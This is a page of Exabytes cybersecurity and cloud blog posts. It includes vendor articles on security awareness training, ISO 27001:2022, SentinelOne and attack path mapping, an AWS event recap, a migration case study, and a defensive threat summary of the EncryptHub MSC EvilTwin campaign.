Home Blog Page 24

The Human Firewall: Why Cybersecurity Awareness Training Is Your Best Defence

By
Praveen Raj
-
0

Introduction

In the ever-evolving world of cyber threats, businesses often focus on implementing advanced technologies—firewalls, intrusion detection systems, endpoint security solutions—to keep attackers at bay. While these are vital, there’s one critical element that technology alone can’t fully control: human behaviour.

Employees remain both a company’s greatest asset and its most vulnerable security risk. A single click on a malicious link, an accidental download of an infected file, or a poorly chosen password can lead to devastating consequences. That’s why forward-thinking organisations are now investing in building a human firewall—a workforce trained to recognise and respond to cyber threats before they cause harm.

Why Technology Alone Isn’t Enough

Cybersecurity tools are essential, but they’re not infallible. Threat actors are becoming increasingly adept at bypassing traditional defences, often by exploiting human trust and error. Phishing attacks, for example, now account for a significant proportion of data breaches worldwide.

Unlike purely technical vulnerabilities, social engineering attacks rely on psychological manipulation. Cyber criminals prey on curiosity, urgency, and fear to trick individuals into giving away sensitive information or opening harmful attachments. Even the most advanced security system can be rendered useless if an employee unknowingly hands an attacker the keys to the network.

Understanding the Psychology of Social Engineering

The success of social engineering lies in its simplicity. Criminals use tactics that tap into natural human instincts:

  • Authority – impersonating a senior executive or official to pressure compliance.
  • Urgency – creating a false sense of time pressure to encourage quick, unthinking actions.
  • Curiosity – sending intriguing subject lines or attachments that tempt clicks.
  • Fear – threatening account closures or penalties to provoke an immediate reaction.

Cybersecurity awareness training teaches employees to pause, think, and verify beforetaking action—counteracting these psychological triggers.

Building the Human Firewall

Creating a human firewall requires more than a one-off training session. It’s an ongoing process that should be integrated into your organisation’s culture. Here are some best practices:

  • Regular Training and Simulations – Conduct quarterly or biannual phishing simulations to test and reinforce employee awareness.
  • Clear Reporting Channels – Ensure staff know exactly how and where to report suspicious emails or incidents.
  • Real-World Examples – Use recent, relevant case studies to highlight the real impact of cyber attacks.
  • Gamification – Turn training into a challenge, rewarding staff for spotting and reporting potential threats.
  • Inclusive Learning – Tailor training for different roles, ensuring relevance whether someone works in finance, HR, or IT.

When employees feel responsible for the security of the organisation, they’re more likely to remain vigilant and proactive.

The ROI of Cybersecurity Awareness

Many businesses hesitate to invest in training, viewing it as a cost rather than a strategic necessity. However, studies consistently show that awareness programmes can drastically reduce successful phishing attempts and data breaches. Preventing even a single incident can save thousands—if not millions—of pounds in lost revenue, legal fees, and reputational damage.

Moreover, a well-trained workforce instils greater customer confidence, demonstrating that your organisation takes security seriously.

Final Thoughts

In 2025, building a human firewall is no longer optional—it’s essential. By empowering employees with the skills and confidence to detect and respond to threats, businesses can create a powerful line of defence that complements technical measures.

🛡️ Don’t wait for a breach to expose weaknesses in your human firewall.

👉 Start with Exabytes eSecure to explore how we can help your organisation strengthen its people-powered defences.

References

  1. UK National Cyber Security Centre (NCSC) – Phishing Guidance
  2. Proofpoint – State of the Phish Report 2024 (UK edition)
  3. Verizon – 2024 Data Breach Investigations Report (DBIR)
  4. Cybercrime Magazine – The Human Firewall and Security Culture

How ISO 27001:2022 Is Reshaping Enterprise Cybersecurity Governance

By
Edwin Alexander
-
0

The 2022 revision of ISO/IEC 27001—the global gold standard for information security management systems (ISMS)—has ushered in a new era of cybersecurity governance. As cyber threats evolve from malware to misinformation, and from credential theft to supply chain compromise, organizations need frameworks that adapt in real-time, not just annually.
This article explores how ISO 27001:2022 reshapes governance structures in enterprise environments, particularly in SOC-driven, tool-integrated ecosystems using platforms like SentinelOne, Stellar Cyber, and Tenable.io. For organizations already certified, like ours, the new version aligns security practices closer to risk, business objectives, and operational resilience.

From Control-Centric to Risk-Integrated Governance

In previous versions, ISO 27001 emphasized a checklist-style implementation of controls. The 2022 revision pivots toward governance that is risk-driven and context-sensitive.
Key changes include:
  • Increased focus on threat intelligence (A.5.7)
  • Integration of security into supplier relationships (A.5.22)
  • Emphasis on monitoring and continuous improvement
  • Recognition of new technologies and hybrid infrastructure
This shift reflects the real-world dynamics of modern SOCs, which rely on constant threat modeling and automation, rather than periodic audits and manual reviews.

Enhancing Governance with SentinelOne, Stellar Cyber, and Tenable

ISO 27001:2022 governance is no longer just about policies—it’s about integrating technology into decision-making and compliance workflows.
Technology Contribution to Governance
SentinelOne (EDR) Automates detection and response; helps enforce A.5.25 (response and continuity) and A.8.7 (endpoint protection)
Stellar Cyber (SIEM/XDR) Enables audit logging, real-time analytics, threat intel ingestion, and compliance correlation for A.5.7, A.5.30
Tenable.io Assists in technical vulnerability management (A.8.8) and risk-based prioritization of exposures
Each of these tools produces governance artifacts—alerts, reports, dashboards—that serve as both operational aids and evidence during ISO audits.

Reshaping Cybersecurity Governance Practices

ISO 27001:2022 drives a transformation in how cybersecurity governance is perceived and practiced:

1. Governance as an Ongoing Activity

  • Logs from Stellar Cyber form real-time evidence trails
  • Continuous risk assessments using Tenable support monthly governance reviews

2. Cross-Department Involvement

  • Governance is no longer limited to IT or GRC teams
  • Marketing, finance, and HR must align their third-party engagements with A.5.22

3. Informed Decision-Making

  • SentinelOne and Stellar Cyber alerts inform management risk decisions
  • SOC dashboards feed directly into Board-level risk matrices

4. ISO Governance = Operational Efficiency

  • Mapping ISO controls to existing tools prevents duplicate workflows
  • Enhances both security posture and audit readiness

Benefits of ISO 27001:2022 Governance

Benefit Description
Dynamic Risk Management Adapts to evolving threat landscapes in real-time
Alignment with Cybersecurity Frameworks Compatible with NIST CSF, CIS, and MITRE ATT&CK
Scalability Across Teams Makes governance a shared responsibility, not a siloed function
Audit Efficiency Prepares organizations for internal, customer, and regulatory audits
Improved Incident Response Governance becomes actionable, not bureaucratic

Final Thoughts

The 2022 revision of ISO/IEC 27001 marks more than just a compliance update — it redefines cybersecurity governance as a continuous, intelligence-driven practice. Gone are the days when governance was a checklist exercise; today, it demands integration of risk, automation, and cross-department collaboration.
For SOCs leveraging platforms like SentinelOne, Stellar Cyber, and Tenable.io, this shift represents opportunity. By embedding governance into daily operations, organizations not only strengthen their security posture but also gain measurable ROI: faster audits, reduced duplication of controls, and improved alignment with business objectives.
For enterprises already certified — or preparing for certification — ISO 27001:2022 is less a burden and more a blueprint for resilience. It empowers CISOs and security teams to transform governance into a proactive shield against evolving threats while streamlining compliance readiness.
🛡️ Governance should not be reactive paperwork.
👉 Start with  Exabytes eSecure to align your security operations with ISO 27001:2022, strengthen your governance framework, and ensure your SOC stays ahead of both compliance and adversaries.

References

  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security, Cybersecurity and Privacy Protection – ISMS Requirements. https://www.iso.org
  • Stellar Cyber. (2025). Security Governance & Audit Readiness with Open XDR. https://www.stellarcyber.ai
  • SentinelOne. (2025). How EDR and AI Power Governance for Compliance Frameworks. https://www.sentinelone.com
  • Tenable. (2025). Governance and Risk Management with Tenable One. https://www.tenable.com
  • National Institute of Standards and Technology. (2024). Cybersecurity Framework 2.0. https://www.nist.gov/cyberframework

Attack Path Mapping with Tenable and Stellar Cyber

By
Edwin Alexander
-
0

In the modern threat landscape, attackers no longer rely on a single point of entry. Instead, they follow a multi-stage progression—exploiting weak configurations, escalating privileges, and pivoting laterally across the network. Understanding and visualizing these potential attack paths is critical for proactive defense.
This article explores how Tenable and Stellar Cyber work together to deliver Attack Path Mapping (APM), empowering Security Operations Centers (SOCs) to anticipate and disrupt adversary movements before a breach occurs. For ISO 27001-certified organizations like ours, APM is more than a capability—it’s a strategic asset for compliance, threat mitigation, and operational resilience.

What Is Attack Path Mapping?

Attack Path Mapping refers to the process of identifying all the possible ways a threat actor can move through an environment—from initial access to critical assets. Unlike traditional vulnerability scanning, APM contextualizes risk based on:
  • Asset criticality
  • User privileges
  • Network topology
  • Exploitable vulnerabilities
  • Security misconfigurations
In short, APM connects the dots between exposures and how they can be chained together to compromise high-value targets.

Tenable: Exposure Management Engine

Tenable.io and Tenable One provide continuous vulnerability assessment and contextual prioritization across:
  • Servers
  • Workstations
  • Cloud workloads
  • Web applications
  • Identity systems (e.g., Active Directory)
Key features that enable APM include:
  • Cyber Exposure Score (CES)
  • Asset criticality tagging
  • Vulnerability chaining detection
  • Attack path simulation (via Tenable Identity Exposure)
For example, Tenable may detect a vulnerable Apache server, exposed credentials in AD, and an unpatched domain controller—forming a full attack path that needs urgent mitigation.

Stellar Cyber: Correlating APM with SIEM/XDR Context

While Tenable identifies exposures, Stellar Cyber correlates them with real-time telemetry and security events. This integration allows:
  • Enrichment of vulnerability data with live endpoint or user behavior
  • Threat scoring based on MITRE ATT&CK TTPs
  • Graph-based visualization of potential attacker lateral movement
  • Automatic playbook triggering to isolate compromised assets
For instance, if Tenable reports an AD misconfiguration and SentinelOne flags unusual LDAP queries, Stellar Cyber will map these into an active attack path and generate a correlated incident.

Benefits of Attack Path Mapping in SOC

Benefit Description
Proactive Defense Fix vulnerabilities before they’re exploited
Risk-Based Prioritization Focus remediation on exploitable paths, not just CVSS scores
Faster Incident Response Visual correlation between vulnerability and active behavior
Compliance Alignment Supports ISO 27001 controls such as A.12.6.1 (technical vulnerability management)
Audit Readiness Clear visibility into how exposure leads to risk

ISO 27001 Alignment:

Relevant ISO 27001:2022 Controls:
  • A.12.6.1: Information systems should be regularly reviewed for vulnerabilities.
  • A.5.31: Threat intelligence and scenario analysis should inform controls.
  • A.8.16: Management of privileged access paths and user rights.
The joint use of Tenable and Stellar Cyber provides continuous evidence of:
  • Proactive threat modeling
  • Exposure management
  • Informed access and vulnerability mitigation strategies
This not only supports audits but reinforces a culture of security by design.

Conclusion

For modern SOCs, the challenge isn’t just finding vulnerabilities — it’s understanding how they connect to form real-world attack paths. Traditional vulnerability scanning provides visibility, but without context, it leaves defenders blind to how attackers actually move.

Attack Path Mapping changes this paradigm. By combining Tenable’s exposure management with Stellar Cyber’s XDR correlation, SOC teams gain a proactive, threat-informed defense strategy. The result: reduced dwell time, smarter prioritization, and measurable ROI through faster detection, streamlined incident response, and stronger ISO 27001 compliance evidence.

For organizations committed to resilience, the choice is clear. Attack Path Mapping isn’t just about closing gaps — it’s about future-proofing your defenses and maximizing the value of your security investments.

🛡️ Don’t wait for adversaries to define your attack paths.

👉 Start with  Exabytes eSecure to map your exposures, align with ISO 27001 controls, and strengthen your defenses against tomorrow’s threats.

References

  • Tenable. (2025). Attack Path Analysis with Tenable One and Identity Exposure. https://www.tenable.com
  • Stellar Cyber. (2025). Attack Path Mapping in the Open XDR Platform. https://www.stellarcyber.ai
  • MITRE. (2024). Enterprise ATT&CK Matrix: Lateral Movement Techniques. https://attack.mitre.org
  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security Management Controls. https://www.iso.org
  • Verizon. (2025). Data Breach Investigations Report. https://www.verizon.com/business/resources/reports/dbir/

EncryptHub: MSC EvilTwin Exploitation & Stealthy Malware Delivery

By
Jun Shen Tan
-
0

EncryptHub and MSC EvilTwin vulnerability illustration

A Russian-linked threat group is combining convincing IT-support impersonation with an MMC vulnerability (“MSC EvilTwin”) to execute malicious console files, drop loaders, and persist via stealthy backdoors.

What Is MSC EvilTwin and EncryptHub?

EncryptHub—also tracked in open sources as LARVA-208 / Water Gamayun—is a financially motivated threat actor known for agile social-engineering campaigns. In recent activity, the group abused a high-severity Microsoft Management Console behavior dubbed MSC EvilTwin, enabling execution of a .msc file with the same display name as a legitimate console so that mmc.exe loads the attacker-controlled file.

Why this matters: the attack subverts a trusted Windows administrative workflow (MMC), giving malicious code the legitimacy of a native management console.

Why It Matters

  • Trusted tools weaponized: Malicious .msc files masquerade as legitimate consoles, reducing user suspicion during execution.
  • Social engineering supercharge: Operators impersonate IT support (via Teams/calls/chat) to convince targets to run scripts or consoles “to fix an issue.”
  • Evolving toolkit: Campaigns feature PowerShell loaders, a Golang loader often referred to as SilentCrystal, and a SOCKS5 backdoor for resilient C2.

How the Attack Works (End-to-End Flow)

  1. Initial approach: The victim is contacted by a fake help-desk persona urging urgent remediation (account lockout, update failure, etc.).
  2. Loader execution: A PowerShell script (e.g., runner.ps1) places two identically named console files—one benign, one rogue—where Windows resolves the attacker version first.
  3. MSC EvilTwin triggers: MMC launches the malicious .msc, executing attacker logic under the guise of an admin console.
  4. Payload chain: The console retrieves another script (e.g., build.ps1), gathers host data, establishes persistence, and beacons to C2.
  5. Post-exploitation: Tooling such as SilentCrystal and a SOCKS5 Golang backdoor provide encrypted proxying and long-lived access; data theft tooling (e.g., stealer malware) may follow.

Key Takeaways

Insight Implication
Legit admin paths abused Malicious consoles blend into standard IT workflows and bypass casual scrutiny.
People are the entry point Convincing support impersonation remains the most reliable initial access vector.
Stealthy loaders/backdoors Golang loaders and SOCKS5 tunnels complicate detection and response.
Cloud + browser abuse Legitimate services (e.g., support portals or file hosting) can be misused for staging.

Defensive Playbook

  1. Patch & harden MMC usage: Keep Windows fully updated; restrict arbitrary .msc execution and require code provenance (AppLocker/WDAC).
  2. Constrain PowerShell: Enable Constrained Language Mode where feasible; log Script Block, Module, and Transcription; alert on suspicious encodings and download cradles.
  3. EDR detections: Flag creation/launch of unknown .msc files, odd MMC load paths, and persistence artifacts following MMC launches.
  4. Network controls: Monitor for unusual TLS beacons and SOCKS5 tunnels; egress-filter to approved destinations; deploy DNS sinkholes for known bads.
  5. Anti-impersonation drills: Train users to verify IT requests via a secondary, trusted channel; pre-publish “no-go” policies (IT will never ask you to run X).
  6. Browser & platform hygiene: Validate updates/support links; disable side-loading of support packages; monitor for staging via public support resources.

Conclusion

EncryptHub’s campaigns demonstrate how quickly threat actors adapt: blend social pressure with native Windows tooling, then hide behind modern loaders and encrypted tunnels. Meeting this challenge requires layered controls—technical guardrails around MMC and PowerShell, rigorous user verification practices, and telemetry that correlates social-engineering signals with endpoint and network behaviors.

References – EncryptHub & MSC EvilTwin

  • The Hacker News. (2025, August). Russian Group EncryptHub Exploits MSC EvilTwin Vulnerability to Deploy Fickle Stealer Malware. Retrieved from https://thehackernews.com
  • SecurityAffairs. (2025, August). EncryptHub abuses Brave Support in new campaign exploiting MSC EvilTwin flaw. Retrieved from https://securityaffairs.com
  • LinkedIn / Das. (2025, August). EncryptHub: Russian Threat Actors’ Evolving Social Engineering. Retrieved from LinkedIn Pulse
  • Medium / Scott Bolen. (2025, August). Threat Actor Profile: EncryptHub (a.k.a. LARVA-208 / Water Gamayun). Retrieved from https://medium.com

Cybersecurity Automation: The Key to Faster Incident Response

By
Ping Ping Lew
-
0

Cybersecurity automation

Introduction

In today’s high-stakes digital environment, security teams are overwhelmed with alerts, manual processes, and limited resources. Traditional approaches to incident response are too slow to keep up with fast-moving threats. That’s why organizations are turning to cybersecurity automation—a powerful strategy that uses machine intelligence to detect, respond to, and neutralize threats in real time.

Cybersecurity automation is not about replacing human analysts—it’s about giving them superpowers.

What is Cybersecurity Automation?

Cybersecurity automation refers to the use of software and artificial intelligence to automatically handle security tasks that were previously done manually. These can include alert triage, threat detection, containment, ticketing, and even post-incident reporting.

At its core, cybersecurity automation accelerates response times, reduces human error, and ensures consistency across the security operations center (SOC).

Why Automation is Critical for Incident Response

Manual incident response can take hours—or even days—to remediate threats. Meanwhile, attackers can exfiltrate data, move laterally, or destroy assets. Here’s how cybersecurity automation addresses these challenges:

Speed: Automated tools respond within seconds, minimizing the window of opportunity for attackers.

Consistency: Playbooks execute the same way every time, ensuring policy adherence and audit readiness.

Efficiency: Freeing analysts from repetitive tasks lets them focus on high-impact investigations.

Scalability: Automation scales effortlessly with growing data volumes and attack surfaces.

Examples of Automation in Action

Phishing Email Response: When a phishing email is reported, an automated system can isolate the message, scan the payload, and quarantine similar emails across the network.

Endpoint Isolation: If malware is detected, the system can isolate the compromised endpoint, notify the SOC, and initiate remediation.

User Account Lockout: Automation can instantly disable accounts showing signs of credential compromise, limiting attacker movement.

Tools Enabling Cybersecurity Automation

Modern cybersecurity platforms include built-in automation features or integrate with SOAR (Security Orchestration, Automation, and Response) tools.

SentinelOne: Endpoint Automation at Its Best

SentinelOne leverages AI and machine learning to deliver autonomous detection and response at the endpoint level. Its automation features include:

Real-time threat mitigation: Automatically kills malicious processes and isolates endpoints.

ActiveEDR with Storyline™: Automatically tracks the full context of an attack and responds without human intervention.

Rollback capability: Unique to Windows, allows automated recovery from ransomware with one click.

SOAR integrations: Supports automation with tools like ServiceNow, Splunk Phantom, and Cortex XSOAR.

Learn more: SentinelOne Singularity Platform
Learn more: Gartner’s SOAR Market Guide
Reference: MITRE ATT&CK Framework for playbook design

Getting Started with Cybersecurity Automation

You don’t need a massive overhaul to begin with cybersecurity automation. Start small and scale smart:

Identify Repetitive Tasks: Begin with alert triage or phishing email responses—simple, high-frequency actions.

Create Automation Playbooks: Document each step in your current response process, then digitize it.

Test and Monitor: Run automated processes in parallel with manual efforts to build confidence and tweak performance.

Train Your Team: Ensure analysts understand how automation works and how to oversee it.

Common Challenges

While cybersecurity automation offers big rewards, it comes with some hurdles:

False Positives: Poorly tuned rules may trigger unnecessary actions.

Over-Reliance: Teams may neglect validation if they trust automation blindly.

Integration Complexity: Not all tools work well together out of the box.

However, with careful design, governance, and testing, these risks can be mitigated.

Conclusion

Cybersecurity automation is no longer a luxury—it’s a necessity for modern incident response. By reducing response times, improving consistency, and enabling faster recovery, automation empowers security teams to outpace cyber threats. Using platforms like SentinelOne for integrating automation into your SOC gives you a crucial edge.

🛡️ Don’t wait for a breach to reveal your weaknesses.

👉 Start with Exabytes eSecure to explore how we can help you strengthen your cybersecurity and incident response with AI-driven solutions.

Building on Success, Growing Forward: AWS | Exabytes: Scale Your Enterprise with Cloud-Driven AI

By
Zenia Lim
-
0
Banner with the text: "Building on Success, Growing Forward: AWS | Exabytes: Scale Your Enterprise with Cloud Driven AI."
Building on success and growing forward with AWS and Exabytes – empowering enterprises to scale with cloud-driven AI.
We successfully wrapped up the first-ever AWS | Exabytes: Scale Your Enterprise with Cloud-Driven AI event in Singapore — a full-day gathering at the AWS SG Office, IOI Central Boulevard Towers. The event brought together business leaders, IT professionals, and decision-makers to explore how cloud, AI, and data-driven strategies can unlock competitive advantage and drive enterprise transformation.

Setting the Stage: Where Enterprises Begin

The day opened with a welcome address by Roger Lew, Vice President & SG Country Manager at Exabytes Singapore, who emphasised the importance of building a strong digital foundation for enterprises in Singapore to fully harness the potential of AI and cloud adoption.
This set the tone for a series of insightful sessions led by industry experts:
  • Dhiraj Garg, Migration BD at AWS, explored Reimagining Business Innovation, highlighting how cloud migration and modernisation strategies enable organisations to scale efficiently and remain competitive in a rapidly evolving digital economy.
Dhiraj Garg from AWS presenting on cloud migration and modernisation strategies at Exabytes event
Dhiraj Garg, Migration BD at AWS, sharing insights on reimagining business innovation through cloud migration and modernisation.
  • Kenneth Ng, Assistant Vice President Solution Architect & Technical Consultant at Exabytes Group, presented Unlocking Enterprise Growth: Harnessing the Power of Cloud-Driven AI, demonstrating practical applications of AI in decision-making, operations optimisation, and business agility.
Kenneth Ng from Exabytes presenting on cloud-driven AI applications for enterprise growth
Kenneth Ng, Assistant Vice President Solution Architect & Technical Consultant at Exabytes Group, sharing how cloud-driven AI empowers decision-making, operations optimisation, and business agility.
  • Gary Gardiner, Director Solution Engineering APJ at SentinelOne, addressed the evolving security landscape, showcasing how AI-powered CNAPP solutions empower enterprises to proactively safeguard against runtime threats and sophisticated cyberattacks.
Gary Gardiner from SentinelOne presenting on AI-powered CNAPP solutions for enterprise security
Gary Gardiner, Director Solution Engineering APJ at SentinelOne, discussing how AI-powered CNAPP solutions help enterprises proactively safeguard against runtime threats and advanced cyberattacks.
  • Richard Cheng, Project Director of FormX.ai, introduced the transformative role of intelligent document processing (IDP), illustrating how AI-powered workflows streamline complex document management, reduce manual errors, and enhance operational efficiency.
Richard Cheng from FormX.ai presenting on AI-powered intelligent document processing (IDP)
Richard Cheng, Projector Director of FormX.ai, sharing how AI-powered intelligent document processing (IDP) streamlines complex document management, minimises manual errors, and boosts operational efficiency.

Panel Discussion: Innovate or Fall Behind

A standout moment of the event was the panel discussion on “Cloud & AI as a Competitive Advantage,” moderated by Arren Tan, Assistant Vice President of Enterprise Sales at Exabytes Group.
The panel brought together:
  • Gary Gardiner, Director of Solution Engineering APJ, SentinelOne
  • Richard Cheng, Project Director, FormX.ai
Panel discussion on Cloud & AI as a Competitive Advantage with leaders from Exabytes, SentinelOne, and FormX.ai
Panel Discussion moderated by Arren Tan, Assistant Vice President of Enterprise Sales at Exabytes Group, featuring Gary Gardiner from SentinelOne and Richard Cheng from FormX.ai.
The discussion offered diverse perspectives on how Singapore enterprises can leverage cloud and AI while balancing innovation, security, compliance, and cost optimisation – key ingredients for sustainable growth in a digital-first economy.

Practical Insights for Singapore Enterprises

Participants gained practical strategies to accelerate their digital transformation journeys, with discussions centred on three key areas:
AI-Driven Data & Analytics – Identifying initial AI use cases, cultivating a data-driven culture, and enhancing customer engagement through personalisation and business intelligence.
Business Modernisation with Cloud & AI – Simplifying cloud migration with minimal disruption, enabling scalability, optimising costs, and supporting compliance in regulated industries.
Cloud Security (CNAPP by SentinelOne) – Strengthening enterprise security with advanced cloud-native protection, ensuring resilience while safeguarding sensitive data.
These insights equipped enterprises with actionable approaches to embrace cloud-driven AI confidently while balancing innovation, resilience, and cost efficiency.

Thank You to Our Partners

We extend our heartfelt appreciation to our partners whose collaboration made this event possible.
As our co-organiser, Amazon Web Services (AWS) played an instrumental role in shaping conversations on innovation and digital transformation. With their expertise in cloud infrastructure and enterprise modernisation, AWS continues to empower businesses in Singapore to reimagine possibilities in today’s AI-driven economy.
We are equally proud to have SentinelOne as our strategic partner. Their AI-powered cybersecurity solutions, including the SentinelOne Singularity™ Platform, provide proactive and autonomous protection across endpoints, cloud, and identity—helping organisations strengthen resilience in an increasingly complex threat landscape.
As our supporting partner, FormX.ai drives operational efficiency through its intelligent document processing (IDP) platform. By leveraging AI-powered data extraction, FormX.ai transforms unstructured documents into actionable insights, enabling businesses to boost productivity and agility.
Together, these partnerships reflect a shared vision: to harness AI, cloud, and cybersecurity innovation in accelerating enterprise growth, strengthening digital resilience, and shaping a smarter future for businesses in Singapore and beyond.

Looking Ahead

At Exabytes, we are committed to being your One-Stop Cloud Solutions & Cybersecurity Managed Services Provider.
Our offerings include:
☁️ eCloud – End-to-End Cloud Modernisation
🔐 eSecure – Advanced Threat Protection
💾 eBackup & DR – Enterprise Backup & Disaster Recovery
⚙️ eCloudApp – Smart Business Applications & AI-Driven Tools
We look forward to supporting Singapore enterprises in building a smarter, more secure, and innovation-driven future.
For more information, visit https://www.exabytes.sg/enterprise

SentinelOne vs Traditional Antivirus: ROI for Enterprise SOCs

By
Edwin Alexander
-
0

SentinelOne vs Traditional Antivirus: ROI for Enterprise SOCs hero image

AI-powered EDR vs. legacy AV — what delivers better outcomes for modern SOCs and ISO 27001 programs.

As cyber threats grow more complex, Security Operations Centers (SOCs) must rethink legacy defenses. Traditional antivirus (AV) solutions, once considered essential, now struggle to keep pace with modern threats like fileless malware, living-off-the-land attacks, and zero-day exploits. In contrast, Endpoint Detection and Response (EDR) tools like SentinelOne offer real-time threat detection, autonomous remediation, and actionable telemetry.

This article compares SentinelOne to traditional antivirus from a return on investment (ROI) perspective and highlights why next-generation endpoint protection is indispensable for enterprise SOCs — particularly in ISO 27001-certified environments like ours.

Traditional Antivirus: Legacy Protection with Limited Context

Traditional antivirus operates on:

  • Signature-based detection
  • Regular definition updates
  • Scheduled scans

While these methods work against known malware, they fail against:

  • Zero-day exploits
  • Polymorphic malware
  • Advanced Persistent Threats (APTs)
  • Fileless attacks

Moreover, traditional AV lacks behavioral analytics, making it ineffective for detecting sophisticated lateral movement or command-and-control (C2) activity.

SentinelOne: AI-Powered Autonomous Endpoint Security

SentinelOne uses an AI-driven engine to analyze file and process behaviors pre-execution, during execution, and post-execution. It operates in multiple modes:

  • EDR: Real-time detection, response, and investigation
  • NGAV (Next-Gen AV): Signature-less malware blocking
  • XDR Ready: Feeds telemetry to Stellar Cyber or other SIEM/XDR platforms
  • Rollback Remediation: Reverts ransomware changes on Windows endpoints

Unlike traditional AV, SentinelOne protects endpoints offline, without signatures, and with automated containment and remediation — minimizing analyst fatigue and dwell time.

ROI Comparison: SentinelOne vs Traditional AV

Category Traditional Antivirus SentinelOne EDR
Detection Capabilities Signature-based only AI/behavioral + signatureless
Zero-Day Coverage Low High
Fileless Malware Defense No Yes
Automated Remediation No Yes
SOC Integration (SIEM/XDR) Minimal Native
Mean Time to Detect (MTTD) Days or weeks Seconds to minutes
Manual Triage Required High Low
Ransomware Rollback No Yes
Compliance Mapping (ISO 27001 A.12.2.1) Partial Full with evidence logging
Cost of Breach Response High (due to dwell time) Lower (automated isolation)

Operational Benefits in an ISO 27001 Environment

As part of an ISO 27001-certified cybersecurity department, using SentinelOne helps meet Annex A controls such as:

  • A.12.2.1: Controls against malware
  • A.16.1.5: Response to information security incidents
  • A.18.1.3: Protection of records and log integrity

SentinelOne provides auditable logs, incident timelines, and forensic details, which can be crucial during internal or certification audits.

Stellar Cyber & SentinelOne: The XDR Advantage

By integrating SentinelOne with Stellar Cyber, our SOC benefits from:

  • Centralized threat correlation
  • Real-time threat hunting
  • Attack path mapping
  • Unified response orchestration

For example, if SentinelOne detects anomalous PowerShell usage, Stellar Cyber can correlate that with lateral movement indicators and elevate it as a prioritized alert — reducing false positives and alert fatigue.

Final Thoughts

The reality for enterprise SOCs is clear: traditional antivirus can no longer keep pace with today’s adversaries. While legacy AV may seem cost-effective on paper, its inability to stop zero-day exploits, fileless attacks, and advanced persistent threats creates hidden costs in remediation, downtime, and compliance risk.

SentinelOne shifts this equation. By combining AI-driven detection, autonomous remediation, and actionable telemetry, it delivers not only stronger protection but measurable ROI through faster containment, reduced analyst workload, and improved compliance alignment with ISO 27001.

For organizations serious about operational resilience, the decision isn’t simply about upgrading endpoint security — it’s about future-proofing the SOC against evolving threats while maximizing security investments.

References

  • SentinelOne. (2025). Why Legacy Antivirus Fails and What Modern EDR Offers. sentinelone.com
  • Gartner. (2025). Market Guide for Endpoint Detection and Response Solutions. gartner.com
  • Stellar Cyber. (2024). Unified SOC Visibility with SentinelOne Integration. stellarcyber.ai
  • International Organization for Standardization. (2022). ISO/IEC 27001:2022 Information Security Management. iso.org
  • MITRE ATT&CK. (2024). Evaluating EDR Products Using ATT&CK Framework. attack.mitre.org

 

A Lift-and-Shift Approach: How E-Global Solved It’s Scallibility and Cost Efficiency Challenges with AWS

By
Janice Kua
-
0

A Lift-and-Shift Approach with AWS: How E-Global Solved It’s Scallibility and Cost Efficiency Challenges

E-Global – Who Are They?

E-Global is a leading provider of Security Operations Center-as-a-Service (SOCaaS), acting as a trusted outsourced partner for organisations that require around-the-clock cybersecurity protection. Their team continuously monitors E-Global networks, detects threats, and responds to incidents in real time, ensuring businesses stay secure without having to build their own in-house SOC. To power this service, E-Global had been running their on-premise Security Operations Center (SOC) on the Stellar Cyber platform. While this setup had supported their operations, it also introduced challenges in scalability, resiliency, and long-term cost efficiency.

The Beginning

To strengthen their service delivery and future-proof their SOCaaS offering, E-Global set a clear objective: migrate their on-premise Stellar Cyber platform to AWS. Their vision was to use a lift-and-shift approach, executing the migration in a single wave to reduce complexity and downtime. The migration plan included transferring 21 workloads across three core components of their SOC environment. This involved backing up critical security data to Amazon S3, launching new Amazon EC2 instances to host workloads, and then restoring and loading data from S3 into the AWS environment.

The Digital Transformation Journey

By leveraging AWS’s reliable and secure cloud infrastructure, E-Global was able to recreate their SOC platform in the cloud with minimal disruption to operations. The workloads were moved seamlessly from on-premise to AWS, taking advantage of EC2’s flexible compute capabilities to run Stellar Cyber efficiently. At the same time, Amazon S3 provided a durable, cost-effective solution for storing and retrieving large volumes of threat intelligence data, logs, and backup files.
The lift-and-shift execution ensured that the E-Global’s SOC team could continue delivering uninterrupted monitoring and threat detection for their clients during the migration process. With AWS, they were able to quickly provision resources, reduce operational overhead, and establish a more resilient foundation for their SOCaaS business.

Outcomes and Business Value

Post-migration, E-Global achieved several key benefits:
  • Improved Scalability – AWS EC2 instances allowed them to right-size and scale resources on-demand, ensuring their SOC platform can keep pace with E-Global growth and increasing security data volumes.
  • Increased Resiliency – With workloads distributed across AWS Availability Zones, the SOC platform gained built-in fault tolerance, enhancing reliability for mission-critical security operations.
  • Cost Optimisation – By adopting AWS’s pay-as-you-go model, E-Global gained better cost control, eliminating the need for heavy upfront hardware investments.
  • Stronger Data Protection – Amazon S3 ensured durable, secure, and compliant storage of sensitive threat intelligence and monitoring data.

The Value of an AWS Partner in Enabling SOC-as-a-Service

For E-Global’s offering SOC-as-a-Service (SOCaaS), the ability to deliver continuous monitoring, rapid threat detection, and swift incident response is critical. In this case, E-Global was operating their on-premise Security Operations Center (SOC) leveraging the Stellar Cyber platform. While their existing setup provided the foundation for delivering outsourced SOC services, they sought to enhance scalability, resiliency, and cost-efficiency by exploring AWS.
Exabytes played a key role in bridging this transition. By assessing the E-Global’s existing on-premise SOC architecture and mapping it to the right AWS services, Exabytes ensured the environment could scale to meet growing demand while maintaining stringent security and compliance standards. Exabytes provided guidance on how AWS could enhance the Stellar Cyber platform deployment—leveraging services like Amazon EC2 for compute flexibility, Amazon S3 for secure storage of logs and threat intelligence data, and Amazon CloudWatch for monitoring and alerting.
Beyond the technical migration, Exabytes added value by implementing AWS security best practices, ensuring workloads were protected through proper identity management, network segmentation, and encryption. They also provided cost optimisation strategies, making sure E-Global could run a high-performance SOCaaS offering without unnecessary spend.
By working with Exabytes, E-Global gained more than a migration pathway—they gained a strategic advisor who helped them modernise their SOC delivery model, ensuring they could provide their end customers with faster, more reliable, and more secure threat detection and response, all powered by AWS.

Looking Ahead

By moving their SOC-as-a-Service platform from on-premise to AWS, E-Global not only modernised their IT environment but also positioned themselves for future innovation in cybersecurity delivery. With a scalable, resilient, and cost-effective SOC running on AWS, they are now better equipped to meet the growing demand for outsourced security operations and deliver even greater value to their clients.

From Legacy Hosting to AWS: Bloyalty’s Tips and Learnings

By
Janice Kua
-
0

